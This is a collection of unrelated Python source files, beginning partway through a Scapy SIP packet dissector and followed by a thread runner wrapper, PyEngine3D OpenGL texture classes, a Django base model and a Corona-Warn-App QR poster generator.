else:
value = ls[0]
ls.remove(ls[0])
for element in ls:
remain = remain + element
return remain, value
elif "SIP" in f[2]:
ls = s.splitlines(True)
f = ls[0].split()
length = len(f)
value = []
if length == 3:
value = "Method:" + f[0] + ", Request-URI:" +\
f[1] + ", SIP-Version:" + f[2]
ls.remove(ls[0])
for element in ls:
remain = remain + element
else:
value = ls[0]
ls.remove(ls[0])
for element in ls:
remain = remain + element
return remain, value
else:
return s, ""
class SIPMsgField(StrField):
"""
field class for handling the body of sip packets
    @attention: it inherits StrField from the Scapy library
"""
holds_packets = 1
name = "SIPMsgField"
myresult = ""
def __init__(self, name, default):
"""
class constructor, for initializing instance variables
@param name: name of the field
@param default: Scapy has many formats to represent the data
        internal, human and machine; you may set this param to None.
"""
self.name = name
self.fmt = "!B"
Field.__init__(self, name, default, "!B")
def getfield(self, pkt, s):
"""
        This method takes the packet, extracts the part that belongs to
        this field and lets the rest go, so it returns two values:
        the first is the value of this field, the second is the
        remaining data that still needs to be dissected by
        other "field classes".
@param pkt: holds the whole packet
@param s: holds only the remaining data which is not dissected yet.
"""
if s.startswith("\r\n"):
s = s.lstrip("\r\n")
if s == "":
return "", ""
self.myresult = ""
for c in s:
self.myresult = self.myresult + base64.standard_b64encode(c)
return "", self.myresult
class SIPField(StrField):
"""
field class for handling the body of sip fields
    @attention: it inherits StrField from the Scapy library
"""
holds_packets = 1
name = "SIPField"
def getfield(self, pkt, s):
"""
        This method takes the packet, extracts the part that belongs to
        this field and lets the rest go, so it returns two values:
        the first is the value of this field, the second is the
        remaining data that still needs to be dissected by
        other "field classes".
@param pkt: holds the whole packet
@param s: holds only the remaining data which is not dissected yet.
"""
if self.name == "unknown-header(s): ":
remain = ""
value = []
ls = s.splitlines(True)
i = -1
for element in ls:
i = i + 1
if element == "\r\n":
return s, []
elif element != "\r\n" and (": " in element[:10])\
and (element[-2:] == "\r\n"):
value.append(element)
ls.remove(ls[i])
remain = ""
unknown = True
for element in ls:
if element != "\r\n" and (": " in element[:15])\
and (element[-2:] == "\r\n") and unknown:
value.append(element)
else:
                            unknown = False
remain = remain + element
return remain, value
return s, []
remain = ""
value = ""
ls = s.splitlines(True)
i = -1
for element in ls:
i = i + 1
if element.upper().startswith(self.name.upper()):
value = element
value = value.strip(self.name)
ls.remove(ls[i])
remain = ""
for element in ls:
remain = remain + element
return remain, value[len(self.name) + 1:]
return s, ""
def __init__(self, name, default, fmt, remain=0):
"""
class constructor for initializing the instance variables
@param name: name of the field
@param default: Scapy has many formats to represent the data
        internal, human and machine; you may set this param to None.
@param fmt: specifying the format, this has been set to "H"
@param remain: this parameter specifies the size of the remaining
data so make it 0 to handle all of the data.
"""
self.name = name
StrField.__init__(self, name, default, fmt, remain)
class SIP(Packet):
"""
class for handling the body of sip packets
    @attention: it inherits Packet from the Scapy library
"""
name = "sip"
fields_desc = [SIPStartField("start-line: ", "", "H"),
SIPField("accept: ", "", "H"),
SIPField("accept-contact: ", "", "H"),
SIPField("accept-encoding: ", "", "H"),
SIPField("accept-language: ", "", "H"),
SIPField("accept-resource-priority: ", "", "H"),
SIPField("alert-info: ", "", "H"),
SIPField("allow: ", "", "H"),
SIPField("allow-events: ", "", "H"),
SIPField("authentication-info: ", "", "H"),
SIPField("authorization: ", "", "H"),
SIPField("call-id: ", "", "H"),
SIPField("call-info: ", "", "H"),
SIPField("contact: ", "", "H"),
SIPField("content-disposition: ", "", "H"),
SIPField("content-encoding: ", "", "H"),
SIPField("content-language: ", "", "H"),
SIPField("content-length: ", "", "H"),
SIPField("content-type: ", "", "H"),
SIPField("cseq: ", "", "H"),
SIPField("date: ", "", "H"),
SIPField("error-info: ", "", "H"),
SIPField("event: ", "", "H"),
SIPField("expires: ", "", "H"),
SIPField("from: ", "", "H"),
SIPField("in-reply-to: ", "", "H"),
SIPField("join: ", "", "H"),
SIPField("max-forwards: ", "", "H"),
SIPField("mime-version: ", "", "H"),
SIPField("min-expires: ", "", "H"),
SIPField("min-se: ", "", "H"),
SIPField("organization: ", "", "H"),
SIPField("p-access-network-info: ", "", "H"),
SIPField("p-asserted-identity: ", "", "H"),
SIPField("p-associated-uri: ", "", "H"),
SIPField("p-called-party-id: ", "", "H"),
SIPField("p-charging-function-addresses: ", "", "H"),
SIPField("p-charging-vector: ", "", "H"),
SIPField("p-dcs-trace-party-id: ", "", "H"),
SIPField("p-dcs-osps: ", "", "H"),
SIPField("p-dcs-billing-info: ", "", "H"),
SIPField("p-dcs-laes: ", "", "H"),
SIPField("p-dcs-redirect: ", "", "H"),
SIPField("p-media-authorization: ", "", "H"),
SIPField("p-preferred-identity: ", "", "H"),
SIPField("p-visited-network-id: ", "", "H"),
SIPField("path: ", "", "H"),
SIPField("priority: ", "", "H"),
SIPField("privacy: ", "", "H"),
SIPField("proxy-authenticate: ", "", "H"),
SIPField("proxy-authorization: ", "", "H"),
SIPField("proxy-require: ", "", "H"),
SIPField("rack: ", "", "H"),
SIPField("reason: ", "", "H"),
SIPField("record-route: ", "", "H"),
SIPField("referred-by: ", "", "H"),
SIPField("reject-contact: ", "", "H"),
SIPField("replaces: ", "", "H"),
SIPField("reply-to: ", "", "H"),
SIPField("request-disposition: ", "", "H"),
SIPField("require: ", "", "H"),
SIPField("resource-priority: ", "", "H"),
SIPField("retry-after: ", "", "H"),
SIPField("route: ", "", "H"),
SIPField("rseq: ", "", "H"),
SIPField("security-client: ", "", "H"),
SIPField("security-server: ", "", "H"),
SIPField("security-verify: ", "", "H"),
SIPField("server: ", "", "H"),
SIPField("service-route: ", "", "H"),
SIPField("session-expires: ", "", "H"),
SIPField("sip-etag: ", "", "H"),
SIPField("sip-if-match: ", "", "H"),
SIPField("subject: ", "", "H"),
SIPField("subscription-state: ", "", "H"),
SIPField("supported: ", "", "H"),
SIPField("timestamp: ", "", "H"),
SIPField("to: ", "", "H"),
SIPField("unsupported: ", "", "H"),
SIPField("user-agent: ", "", "H"),
SIPField("via: ", "", "H"),
SIPField("warning: ", "", "H"),
SIPField("www-authenticate: ", "", "H"),
SIPField("refer-to: ", "", "H"),
SIPField("history-info: ", "", "H"),
SIPField("unknown-header(s): ", "", "H"),
SIPMsgField("message-body: ", "")]
bind_layers(TCP, SIP, sport=5060)
bind_layers(TCP, SIP, dport=5060)
bind_layers(UDP, SIP, sport=5060)
bind_layers(UDP, SIP, dport=5060)
|
31105
|
import abc
import logging
from datetime import datetime
from .log_adapter import adapt_log
LOGGER = logging.getLogger(__name__)
class RunnerWrapper(abc.ABC):
""" Runner wrapper class """
log = adapt_log(LOGGER, 'RunnerWrapper')
def __init__(self, func_runner, runner_id, key, tracker, log_exception=True):
""" Runner wrapper initializer
Args:
func_runner (FuncRunner): FuncRunner instance
runner_id (int): runner id
key (str): key to store the function output in output dict
tracker (dict): tracker dict
"""
self.func_runner = func_runner
self.id = runner_id
self.tracker = tracker
self.log_exception = log_exception
self.key = key
self.runner = None
self.__initialize_tracker()
def __str__(self):
return "<RunnerWrapper %s[#%s] %s>" % (self.key, self.id, self.func_runner)
def __initialize_tracker(self):
self.tracker[self.key] = dict()
def __update_tracker(self, started, finished, output, got_error, error):
""" Updates status in output dict """
self.tracker[self.key] = {
"started_time": started,
"finished_time": finished,
"execution_time": (finished - started).total_seconds(),
"output": output,
"got_error": got_error,
"error": error
}
def is_tracker_updated(self):
return True if self.tracker[self.key] else False
def run(self):
""" Runs function runner """
output, error, got_error = None, None, False
started = datetime.now()
try:
output = self.func_runner.run()
except Exception as e:
got_error = True
error = str(e)
if self.log_exception:
self.log.exception("Encountered an exception on {} {}".format(self, e))
finally:
finished = datetime.now()
self.__update_tracker(started, finished, output, got_error, error)
def join(self):
self.runner.join()
@abc.abstractmethod
def start(self):
""" Starts runner thread """
pass
@abc.abstractmethod
def is_running(self):
""" Returns True if runner is active else False """
pass
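# Hedged sketch of a concrete, thread-backed wrapper; the class name and the use of
# threading.Thread are assumptions, only the abstract interface above is taken as given.
import threading
class ThreadedRunnerWrapper(RunnerWrapper):
    def start(self):
        """ Starts the runner in a daemon thread """
        self.runner = threading.Thread(target=self.run, name='runner-%s' % self.id)
        self.runner.daemon = True
        self.runner.start()
    def is_running(self):
        """ Returns True if the runner thread is alive else False """
        return self.runner is not None and self.runner.is_alive()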
|
31111
|
import traceback
import copy
import gc
from ctypes import c_void_p
import itertools
import array
import math
import numpy as np
from OpenGL.GL import *
from PyEngine3D.Common import logger
from PyEngine3D.Utilities import Singleton, GetClassName, Attributes, Profiler
from PyEngine3D.OpenGLContext import OpenGLContext
def get_numpy_dtype(data_type):
if GL_BYTE == data_type:
return np.int8
    elif GL_UNSIGNED_BYTE == data_type:
        return np.uint8
elif GL_SHORT == data_type:
return np.int16
elif GL_UNSIGNED_SHORT == data_type:
return np.uint16
elif GL_INT == data_type:
return np.int32
elif GL_UNSIGNED_INT == data_type:
return np.uint32
elif GL_UNSIGNED_INT64 == data_type:
return np.uint64
elif GL_FLOAT == data_type:
return np.float32
elif GL_DOUBLE == data_type:
return np.float64
    logger.error('Cannot convert to numpy dtype. UNKNOWN DATA TYPE(%s)', data_type)
return np.uint8
def get_internal_format(str_image_mode):
if str_image_mode == "RGBA":
return GL_RGBA8
elif str_image_mode == "RGB":
return GL_RGB8
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_R8
else:
logger.error("get_internal_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA8
def get_texture_format(str_image_mode):
if str_image_mode == "RGBA":
# R,G,B,A order. GL_BGRA is faster than GL_RGBA
return GL_RGBA # GL_BGRA
elif str_image_mode == "RGB":
return GL_RGB
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_RED
else:
logger.error("get_texture_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA
def get_image_mode(texture_internal_format):
if texture_internal_format in (GL_RGBA, GL_BGRA):
return "RGBA"
elif texture_internal_format in (GL_RGB, GL_BGR):
return "RGB"
elif texture_internal_format == GL_RG:
return "RG"
elif texture_internal_format in (GL_R8, GL_R16F, GL_RED, GL_DEPTH_STENCIL, GL_DEPTH_COMPONENT):
return "R"
elif texture_internal_format == GL_LUMINANCE:
return "L"
else:
logger.error("get_image_mode::unknown image format ( %s )" % texture_internal_format)
return "RGBA"
def CreateTexture(**texture_datas):
texture_class = texture_datas.get('texture_type', Texture2D)
if texture_class is not None:
if type(texture_class) is str:
texture_class = eval(texture_class)
return texture_class(**texture_datas)
return None
class Texture:
target = GL_TEXTURE_2D
default_wrap = GL_REPEAT
use_glTexStorage = False
def __init__(self, **texture_data):
self.name = texture_data.get('name')
self.attachment = False
self.image_mode = "RGBA"
self.internal_format = GL_RGBA8
self.texture_format = GL_RGBA
self.sRGB = False
self.clear_color = None
self.multisample_count = 0
self.width = 0
self.height = 0
self.depth = 1
self.data_type = GL_UNSIGNED_BYTE
self.min_filter = GL_LINEAR_MIPMAP_LINEAR
self.mag_filter = GL_LINEAR
self.enable_mipmap = False
self.wrap = self.default_wrap
self.wrap_s = self.default_wrap
self.wrap_t = self.default_wrap
self.wrap_r = self.default_wrap
self.buffer = -1
self.sampler_handle = -1
self.attribute = Attributes()
self.create_texture(**texture_data)
def create_texture(self, **texture_data):
if self.buffer != -1:
self.delete()
self.attachment = False
self.image_mode = texture_data.get('image_mode')
self.internal_format = texture_data.get('internal_format')
self.texture_format = texture_data.get('texture_format')
self.sRGB = texture_data.get('sRGB', False)
self.clear_color = texture_data.get('clear_color')
self.multisample_count = 0
if self.internal_format is None and self.image_mode:
self.internal_format = get_internal_format(self.image_mode)
if self.texture_format is None and self.image_mode:
self.texture_format = get_texture_format(self.image_mode)
if self.image_mode is None and self.texture_format:
self.image_mode = get_image_mode(self.texture_format)
# Convert to sRGB
if self.sRGB:
if self.internal_format == GL_RGB:
self.internal_format = GL_SRGB8
elif self.internal_format == GL_RGBA:
self.internal_format = GL_SRGB8_ALPHA8
if GL_RGBA == self.internal_format:
self.internal_format = GL_RGBA8
if GL_RGB == self.internal_format:
self.internal_format = GL_RGB8
self.width = int(texture_data.get('width', 0))
self.height = int(texture_data.get('height', 0))
self.depth = int(max(1, texture_data.get('depth', 1)))
self.data_type = texture_data.get('data_type', GL_UNSIGNED_BYTE)
self.min_filter = texture_data.get('min_filter', GL_LINEAR_MIPMAP_LINEAR)
self.mag_filter = texture_data.get('mag_filter', GL_LINEAR) # GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR, GL_NEAREST
mipmap_filters = (GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR_MIPMAP_NEAREST,
GL_NEAREST_MIPMAP_LINEAR, GL_NEAREST_MIPMAP_NEAREST)
self.enable_mipmap = self.min_filter in mipmap_filters
if self.target == GL_TEXTURE_2D_MULTISAMPLE:
self.enable_mipmap = False
self.wrap = texture_data.get('wrap', self.default_wrap) # GL_REPEAT, GL_CLAMP
self.wrap_s = texture_data.get('wrap_s')
self.wrap_t = texture_data.get('wrap_t')
self.wrap_r = texture_data.get('wrap_r')
self.buffer = -1
self.sampler_handle = -1
# texture parameter overwrite
# self.sampler_handle = glGenSamplers(1)
# glSamplerParameteri(self.sampler_handle, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
# glBindSampler(0, self.sampler_handle)
logger.info("Create %s : %s %dx%dx%d %s mipmap(%s)." % (
GetClassName(self), self.name, self.width, self.height, self.depth, str(self.internal_format),
'Enable' if self.enable_mipmap else 'Disable'))
self.attribute = Attributes()
def __del__(self):
pass
def delete(self):
logger.info("Delete %s : %s" % (GetClassName(self), self.name))
glDeleteTextures([self.buffer, ])
self.buffer = -1
def get_texture_info(self):
return dict(
texture_type=self.__class__.__name__,
width=self.width,
height=self.height,
depth=self.depth,
image_mode=self.image_mode,
internal_format=self.internal_format,
texture_format=self.texture_format,
data_type=self.data_type,
min_filter=self.min_filter,
mag_filter=self.mag_filter,
wrap=self.wrap,
wrap_s=self.wrap_s,
wrap_t=self.wrap_t,
wrap_r=self.wrap_r,
)
def get_save_data(self):
save_data = self.get_texture_info()
data = self.get_image_data()
if data is not None:
save_data['data'] = data
return save_data
def get_mipmap_size(self, level=0):
if 0 < level:
divider = 2.0 ** level
width = max(1, int(self.width / divider))
height = max(1, int(self.height / divider))
return width, height
return self.width, self.height
def get_image_data(self, level=0):
if self.target not in (GL_TEXTURE_2D, GL_TEXTURE_2D_ARRAY, GL_TEXTURE_3D):
return None
level = min(level, self.get_mipmap_count())
dtype = get_numpy_dtype(self.data_type)
try:
glBindTexture(self.target, self.buffer)
data = OpenGLContext.glGetTexImage(self.target, level, self.texture_format, self.data_type)
# convert to numpy array
if type(data) is bytes:
data = np.frombuffer(data, dtype=dtype).copy()  # frombuffer replaces the deprecated fromstring
else:
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
return data
except:
logger.error(traceback.format_exc())
logger.error('%s failed to get image data.' % self.name)
logger.info('Try to glReadPixels.')
glBindTexture(self.target, self.buffer)
fb = glGenFramebuffers(1)
glBindFramebuffer(GL_FRAMEBUFFER, fb)
data = []
for layer in range(self.depth):
if GL_TEXTURE_2D == self.target:
glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.buffer, level)
elif GL_TEXTURE_3D == self.target:
glFramebufferTexture3D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_3D, self.buffer, level, layer)
elif GL_TEXTURE_2D_ARRAY == self.target:
glFramebufferTextureLayer(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, self.buffer, level, layer)
glReadBuffer(GL_COLOR_ATTACHMENT0)
width, height = self.get_mipmap_size(level)
pixels = glReadPixels(0, 0, width, height, self.texture_format, self.data_type)
# convert to numpy array
if type(pixels) is bytes:
pixels = np.frombuffer(pixels, dtype=dtype)  # frombuffer replaces the deprecated fromstring
data.append(pixels)
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
glBindFramebuffer(GL_FRAMEBUFFER, 0)
glDeleteFramebuffers(1, [fb, ])
return data
def get_mipmap_count(self):
factor = max(max(self.width, self.height), self.depth)
return math.floor(math.log2(factor)) + 1
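# Example: a 1024x1024x1 texture yields floor(log2(1024)) + 1 = 11 mipmap levels
# (1024 down to 1).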
def generate_mipmap(self):
if self.enable_mipmap:
glBindTexture(self.target, self.buffer)
glGenerateMipmap(self.target)
else:
logger.warn('%s: mipmap generation is disabled.' % self.name)
def texture_wrap(self, wrap):
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, wrap)
def bind_texture(self, wrap=None):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
glBindTexture(self.target, self.buffer)
if wrap is not None:
self.texture_wrap(wrap)
def bind_image(self, image_unit, level=0, access=GL_READ_WRITE):
if self.buffer == -1:
logger.warn("%s texture is invalid." % self.name)
return
# flag : GL_READ_WRITE, GL_WRITE_ONLY, GL_READ_ONLY
glBindImageTexture(image_unit, self.buffer, level, GL_FALSE, 0, access, self.internal_format)
def is_attached(self):
return self.attachment
def set_attachment(self, attachment):
self.attachment = attachment
def get_attribute(self):
self.attribute.set_attribute("name", self.name)
self.attribute.set_attribute("target", self.target)
self.attribute.set_attribute("width", self.width)
self.attribute.set_attribute("height", self.height)
self.attribute.set_attribute("depth", self.depth)
self.attribute.set_attribute("image_mode", self.image_mode)
self.attribute.set_attribute("internal_format", self.internal_format)
self.attribute.set_attribute("texture_format", self.texture_format)
self.attribute.set_attribute("data_type", self.data_type)
self.attribute.set_attribute("min_filter", self.min_filter)
self.attribute.set_attribute("mag_filter", self.mag_filter)
self.attribute.set_attribute("multisample_count", self.multisample_count)
self.attribute.set_attribute("wrap", self.wrap)
self.attribute.set_attribute("wrap_s", self.wrap_s)
self.attribute.set_attribute("wrap_t", self.wrap_t)
self.attribute.set_attribute("wrap_r", self.wrap_r)
return self.attribute
def set_attribute(self, attribute_name, attribute_value, item_info_history, attribute_index):
if hasattr(self, attribute_name) and "" != attribute_value:
setattr(self, attribute_name, eval(attribute_value))
if 'wrap' in attribute_name:
glBindTexture(self.target, self.buffer)
glTexParameteri(self.target, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(self.target, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glBindTexture(self.target, 0)
return self.attribute
class Texture2D(Texture):
target = GL_TEXTURE_2D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_2D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height)
if data is not None:
glTexSubImage2D(GL_TEXTURE_2D,
0,
0, 0,
self.width, self.height,
self.texture_format,
self.data_type,
data)
else:
glTexImage2D(GL_TEXTURE_2D,
0,
self.internal_format,
self.width,
self.height,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
if self.clear_color is not None:
glClearTexImage(self.buffer, 0, self.texture_format, self.data_type, self.clear_color)
glBindTexture(GL_TEXTURE_2D, 0)
class Texture2DArray(Texture):
target = GL_TEXTURE_2D_ARRAY
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_ARRAY, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_2D_ARRAY,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_2D_ARRAY,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_2D_ARRAY,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_2D_ARRAY)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_2D_ARRAY, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_2D_ARRAY, 0)
class Texture3D(Texture):
target = GL_TEXTURE_3D
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
data = texture_data.get('data')
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_3D, self.buffer)
if self.use_glTexStorage:
glTexStorage3D(GL_TEXTURE_3D,
self.get_mipmap_count(),
self.internal_format,
self.width, self.height, self.depth)
if data is not None:
glTexSubImage3D(GL_TEXTURE_3D,
0,
0, 0, 0,
self.width, self.height, self.depth,
self.texture_format,
self.data_type,
data)
else:
glTexImage3D(GL_TEXTURE_3D,
0,
self.internal_format,
self.width,
self.height,
self.depth,
0,
self.texture_format,
self.data_type,
data)
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_3D)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_3D, 0)
class Texture2DMultiSample(Texture):
target = GL_TEXTURE_2D_MULTISAMPLE
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
multisample_count = texture_data.get('multisample_count', 4)
self.multisample_count = multisample_count - (multisample_count % 4)
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, self.buffer)
if self.use_glTexStorage:
glTexStorage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
else:
glTexImage2DMultisample(GL_TEXTURE_2D_MULTISAMPLE,
self.multisample_count,
self.internal_format,
self.width,
self.height,
GL_TRUE)
glBindTexture(GL_TEXTURE_2D_MULTISAMPLE, 0)
class TextureCube(Texture):
target = GL_TEXTURE_CUBE_MAP
default_wrap = GL_REPEAT
def __init__(self, **texture_data):
self.texture_positive_x = None
self.texture_negative_x = None
self.texture_positive_y = None
self.texture_negative_y = None
self.texture_positive_z = None
self.texture_negative_z = None
Texture.__init__(self, **texture_data)
def create_texture(self, **texture_data):
Texture.create_texture(self, **texture_data)
# If texture2d is None then create render target.
face_texture_datas = copy.copy(texture_data)
face_texture_datas.pop('name')
face_texture_datas['texture_type'] = Texture2D
self.texture_positive_x = texture_data.get('texture_positive_x', CreateTexture(name=self.name + "_right", **face_texture_datas))
self.texture_negative_x = texture_data.get('texture_negative_x', CreateTexture(name=self.name + "_left", **face_texture_datas))
self.texture_positive_y = texture_data.get('texture_positive_y', CreateTexture(name=self.name + "_top", **face_texture_datas))
self.texture_negative_y = texture_data.get('texture_negative_y', CreateTexture(name=self.name + "_bottom", **face_texture_datas))
self.texture_positive_z = texture_data.get('texture_positive_z', CreateTexture(name=self.name + "_front", **face_texture_datas))
self.texture_negative_z = texture_data.get('texture_negative_z', CreateTexture(name=self.name + "_back", **face_texture_datas))
self.buffer = glGenTextures(1)
glBindTexture(GL_TEXTURE_CUBE_MAP, self.buffer)
if self.use_glTexStorage:
glTexStorage2D(GL_TEXTURE_CUBE_MAP, self.get_mipmap_count(), self.internal_format, self.width, self.height)
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexSubImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
else:
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_X, self.texture_positive_x) # Right
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_X, self.texture_negative_x) # Left
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Y, self.texture_positive_y) # Top
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Y, self.texture_negative_y) # Bottom
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_POSITIVE_Z, self.texture_positive_z) # Front
self.createTexImage2D(GL_TEXTURE_CUBE_MAP_NEGATIVE_Z, self.texture_negative_z) # Back
if self.enable_mipmap:
glGenerateMipmap(GL_TEXTURE_CUBE_MAP)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_S, self.wrap_s or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_T, self.wrap_t or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_WRAP_R, self.wrap_r or self.wrap)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MIN_FILTER, self.min_filter)
glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MAG_FILTER, self.mag_filter)
glBindTexture(GL_TEXTURE_CUBE_MAP, 0)
@staticmethod
def createTexImage2D(target_face, texture):
glTexImage2D(target_face,
0,
texture.internal_format,
texture.width,
texture.height,
0,
texture.texture_format,
texture.data_type,
texture.get_image_data())
@staticmethod
def createTexSubImage2D(target_face, texture):
glTexSubImage2D(target_face,
0,
0, 0,
texture.width, texture.height,
texture.texture_format,
texture.data_type,
texture.get_image_data())
def delete(self):
super(TextureCube, self).delete()
self.texture_positive_x.delete()
self.texture_negative_x.delete()
self.texture_positive_y.delete()
self.texture_negative_y.delete()
self.texture_positive_z.delete()
self.texture_negative_z.delete()
def get_save_data(self, get_image_data=True):
save_data = Texture.get_save_data(self)
save_data['texture_positive_x'] = self.texture_positive_x.name
save_data['texture_negative_x'] = self.texture_negative_x.name
save_data['texture_positive_y'] = self.texture_positive_y.name
save_data['texture_negative_y'] = self.texture_negative_y.name
save_data['texture_positive_z'] = self.texture_positive_z.name
save_data['texture_negative_z'] = self.texture_negative_z.name
return save_data
def get_attribute(self):
Texture.get_attribute(self)
self.attribute.set_attribute("texture_positive_x", self.texture_positive_x.name)
self.attribute.set_attribute("texture_negative_x", self.texture_negative_x.name)
self.attribute.set_attribute("texture_positive_y", self.texture_positive_y.name)
self.attribute.set_attribute("texture_negative_y", self.texture_negative_y.name)
self.attribute.set_attribute("texture_positive_z", self.texture_positive_z.name)
self.attribute.set_attribute("texture_negative_z", self.texture_negative_z.name)
return self.attribute
|
31119
|
from django.db import models
class BaseModel(models.Model):
class Meta:
abstract = True
def reload(self):
new_self = self.__class__.objects.get(pk=self.pk)
# Clear and update the old dict.
self.__dict__.clear()
self.__dict__.update(new_self.__dict__)
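# Usage sketch (hypothetical model Article subclassing BaseModel): after the row
# is changed elsewhere, reload() refreshes this instance in place.
#
#   article = Article.objects.get(pk=1)
#   # ... row modified by another process ...
#   article.reload()  # article.__dict__ now mirrors the current DB state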
|
31122
|
import io
import os
from svgutils import transform as svg_utils
import qrcode.image.svg
from cwa_qr import generate_qr_code, CwaEventDescription
class CwaPoster(object):
POSTER_PORTRAIT = 'portrait'
POSTER_LANDSCAPE = 'landscape'
TRANSLATIONS = {
POSTER_PORTRAIT: {
'file': 'poster/portrait.svg',
'x': 80,
'y': 60,
'scale': 6
},
POSTER_LANDSCAPE: {
'file': 'poster/landscape.svg',
'x': 42,
'y': 120,
'scale': 4.8
}
}
def generate_poster(event_description: CwaEventDescription, template: str) -> svg_utils.SVGFigure:
qr = generate_qr_code(event_description)
svg = qr.make_image(image_factory=qrcode.image.svg.SvgPathImage)
svg_bytes = io.BytesIO()
svg.save(svg_bytes)
poster = svg_utils.fromfile('{}/{}'.format(
os.path.dirname(os.path.abspath(__file__)),
CwaPoster.TRANSLATIONS[template]['file']
))
overlay = svg_utils.fromstring(svg_bytes.getvalue().decode('UTF-8')).getroot()
overlay.moveto(
CwaPoster.TRANSLATIONS[template]['x'],
CwaPoster.TRANSLATIONS[template]['y'],
CwaPoster.TRANSLATIONS[template]['scale']
)
poster.append([overlay])
return poster
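# Usage sketch (hypothetical values; construct CwaEventDescription as required by
# cwa_qr): render the portrait template and write the merged SVG to disk.
#
#   description = CwaEventDescription(...)
#   poster = generate_poster(description, CwaPoster.POSTER_PORTRAIT)
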